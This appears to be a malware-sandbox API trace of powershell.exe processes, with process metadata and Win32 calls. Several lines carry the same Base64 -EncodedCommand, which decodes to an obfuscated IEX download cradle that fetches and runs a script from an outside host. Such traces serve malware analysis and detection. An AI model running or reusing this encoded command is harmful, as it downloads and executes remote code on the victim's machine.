	[0819.390] CoTaskMemFree (pv=0x2b1b20) 
	[0819.396] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0819.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0819.396] CoTaskMemFree (pv=0x2b1b20) 
	[0819.398] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c67e480 | out: pNumArgs=0x1c67e480) returned 0x1b763c70*=""
	[0819.400] lstrlenW (lpString="-EncodedCommand") returned 15
	[0819.402] CoTaskMemAlloc (cb=0x22) returned 0x1b751b60
	[0819.402] RtlMoveMemory (in: Destination=0x1b751b60, Source=0x1b763c92, Length=0x20 | out: Destination=0x1b751b60) 
	[0819.402] CoTaskMemFree (pv=0x1b751b60) 
	[0819.402] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0819.402] CoTaskMemAlloc (cb=0x2f4) returned 0x23e9e0
	[0819.402] RtlMoveMemory (in: Destination=0x23e9e0, Source=0x1b763cb2, Length=0x2f2 | out: Destination=0x23e9e0) 
	[0819.402] CoTaskMemFree (pv=0x23e9e0) 
	[0819.403] LocalFree (hMem=0x1b763c70) returned 0x0
	[0819.404] CoTaskMemAlloc (cb=0x804) returned 0x1b76d3b0
	[0819.404] GetConsoleTitleW (in: lpConsoleTitle=0x1b76d3b0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0819.405] CoTaskMemFree (pv=0x1b76d3b0) 
	[0819.415] CoTaskMemAlloc (cb=0x38e) returned 0x1b763c70
	[0819.415] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c67e3e0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2f8d900 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f8d900*(hProcess=0x39c, hThread=0x350, dwProcessId=0x10d4, dwThreadId=0x1fe0)) returned 1
	[0820.024] CoTaskMemFree (pv=0x1b763c70) 
	[0820.025] CloseHandle (hObject=0x350) returned 1
	[0820.025] CoTaskMemAlloc (cb=0x3b) returned 0x2c6540
	[0820.025] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c67e488, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c67e488) returned 0x4550
	[0820.026] CoTaskMemFree (pv=0x2c6540) 
	[0820.029] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.029] GetCurrentProcess () returned 0xffffffffffffffff
	[0820.030] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c67e568, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c67e568*=0x350) returned 1

Process:
	id = "53"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x23c05000"
	os_pid = "0xeb4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 299
	os_tid = 0xeb8


Thread:
	id = 403
	os_tid = 0x1038


Thread:
	id = 406
	os_tid = 0x1044


Process:
	id = "54"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x23d13000"
	os_pid = "0xec8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 301
	os_tid = 0xecc

	[0588.583] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0594.161] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.162] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0594.162] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0594.162] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0611.197] GetVersionExW (in: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0611.201] GetVersionExW (in: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dfa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0611.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0611.209] GetVersionExW (in: lpVersionInformation=0x16dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0611.210] SetErrorMode (uMode=0x1) returned 0x1
	[0611.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16de70 | out: lpFileInformation=0x16de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0612.117] SetErrorMode (uMode=0x1) returned 0x1
	[0612.120] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e0e0 | out: lpdwHandle=0x16e0e0) returned 0x94c
	[0612.124] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be72d8 | out: lpData=0x2be72d8) returned 1
	[0612.126] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16e058, puLen=0x16e050 | out: lplpBuffer=0x16e058*=0x2be7374, puLen=0x16e050) returned 1
	[0612.129] lstrlenW (lpString="䅁") returned 1
	[0612.138] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be7450, puLen=0x16dfc0) returned 1
	[0612.139] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0612.141] CoTaskMemAlloc (cb=0x2e) returned 0x2c0470
	[0612.141] lstrcpyW (in: lpString1=0x2c0470, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0612.142] CoTaskMemFree (pv=0x2c0470) 
	[0612.142] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be74a4, puLen=0x16dfc0) returned 1
	[0612.142] lstrlenW (lpString="System.Management.Automation") returned 28
	[0612.142] CoTaskMemAlloc (cb=0x3c) returned 0x1f9860
	[0612.143] lstrcpyW (in: lpString1=0x1f9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0612.143] CoTaskMemFree (pv=0x1f9860) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be7500, puLen=0x16dfc0) returned 1
	[0612.143] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0612.143] CoTaskMemAlloc (cb=0x20) returned 0x2be6c0
	[0612.143] lstrcpyW (in: lpString1=0x2be6c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0612.143] CoTaskMemFree (pv=0x2be6c0) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be7540, puLen=0x16dfc0) returned 1
	[0612.143] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0612.143] CoTaskMemAlloc (cb=0x44) returned 0x1f9860
	[0612.143] lstrcpyW (in: lpString1=0x1f9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0612.143] CoTaskMemFree (pv=0x1f9860) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be75a8, puLen=0x16dfc0) returned 1
	[0612.143] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0612.143] CoTaskMemAlloc (cb=0x76) returned 0x25f940
	[0612.143] lstrcpyW (in: lpString1=0x25f940, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0612.143] CoTaskMemFree (pv=0x25f940) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be7644, puLen=0x16dfc0) returned 1
	[0612.143] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0612.143] CoTaskMemAlloc (cb=0x44) returned 0x1f9860
	[0612.143] lstrcpyW (in: lpString1=0x1f9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0612.143] CoTaskMemFree (pv=0x1f9860) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be76a8, puLen=0x16dfc0) returned 1
	[0612.143] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0612.143] CoTaskMemAlloc (cb=0x58) returned 0x284500
	[0612.143] lstrcpyW (in: lpString1=0x284500, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0612.143] CoTaskMemFree (pv=0x284500) 
	[0612.143] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be7724, puLen=0x16dfc0) returned 1
	[0612.144] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0612.144] CoTaskMemAlloc (cb=0x20) returned 0x2be6c0
	[0612.144] lstrcpyW (in: lpString1=0x2be6c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0612.144] CoTaskMemFree (pv=0x2be6c0) 
	[0612.144] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x2be73cc, puLen=0x16dfc0) returned 1
	[0612.144] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0612.144] CoTaskMemAlloc (cb=0x66) returned 0x23c4b0
	[0612.144] lstrcpyW (in: lpString1=0x23c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0612.144] CoTaskMemFree (pv=0x23c4b0) 
	[0612.144] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0612.144] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0612.144] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dfc8, puLen=0x16dfc0 | out: lplpBuffer=0x16dfc8*=0x0, puLen=0x16dfc0) returned 0
	[0612.144] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df98, puLen=0x16df90 | out: lplpBuffer=0x16df98*=0x2be7374, puLen=0x16df90) returned 1
	[0612.145] CoTaskMemAlloc (cb=0x204) returned 0x263e90
	[0612.145] VerLanguageNameW (in: wLang=0x0, szLang=0x263e90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0612.216] CoTaskMemFree (pv=0x263e90) 
	[0612.216] VerQueryValueW (in: pBlock=0x2be72d8, lpSubBlock="\\", lplpBuffer=0x16dfe8, puLen=0x16dfe0 | out: lplpBuffer=0x16dfe8*=0x2be7300, puLen=0x16dfe0) returned 1
	[0612.221] GetCurrentProcessId () returned 0xec8
	[0613.316] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16cf10 | out: lpLuid=0x16cf10*(LowPart=0x14, HighPart=0)) returned 1
	[0613.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0613.321] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cf30 | out: TokenHandle=0x16cf30*=0x1c0) returned 1
	[0613.330] AdjustTokenPrivileges (in: TokenHandle=0x1c0, DisableAllPrivileges=0, NewState=0x2beab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0613.331] CloseHandle (hObject=0x1c0) returned 1
	[0613.336] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec8) returned 0x1c0
	[0614.382] EnumProcessModules (in: hProcess=0x1c0, lphModule=0x2beabb8, cb=0x200, lpcbNeeded=0x16df48 | out: lphModule=0x2beabb8, lpcbNeeded=0x16df48) returned 1
	[0614.384] GetModuleInformation (in: hProcess=0x1c0, hModule=0x13f370000, lpmodinfo=0x2beae28, cb=0x18 | out: lpmodinfo=0x2beae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0614.385] CoTaskMemAlloc (cb=0x804) returned 0x2c7840
	[0614.385] GetModuleBaseNameW (in: hProcess=0x1c0, hModule=0x13f370000, lpBaseName=0x2c7840, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0614.385] CoTaskMemFree (pv=0x2c7840) 
	[0614.386] CoTaskMemAlloc (cb=0x804) returned 0x2c7840
	[0614.386] GetModuleFileNameExW (in: hProcess=0x1c0, hModule=0x13f370000, lpFilename=0x2c7840, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0614.386] CoTaskMemFree (pv=0x2c7840) 
	[0614.387] CloseHandle (hObject=0x1c0) returned 1
	[0614.398] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xec8) returned 0x1c0
	[0614.399] GetExitCodeProcess (in: hProcess=0x1c0, lpExitCode=0x16e078 | out: lpExitCode=0x16e078*=0x103) returned 1
	[0614.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12beb088, Length=0x20000, ResultLength=0x16e040 | out: SystemInformation=0x12beb088, ResultLength=0x16e040*=0x36db8) returned 0xc0000004
	[0614.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b0b8, Length=0x395b8, ResultLength=0x16e040 | out: SystemInformation=0x12c0b0b8, ResultLength=0x16e040*=0x36e08) returned 0x0
	[0615.377] EnumWindows (lpEnumFunc=0x2b666ac, lParam=0x0) 
	[0622.451] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0622.792] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x558
	[0623.820] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.675] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.684] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.687] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x538
	[0624.690] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0624.693] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0625.440] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0625.639] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.460] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.930] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.935] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.940] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.944] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.946] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.948] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0626.950] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0626.951] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0628.514] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.549] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x3a8
	[0630.549] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bd0
	[0630.549] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bfc
	[0630.549] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1a78
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b90
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b04
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b34
	[0630.550] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b64
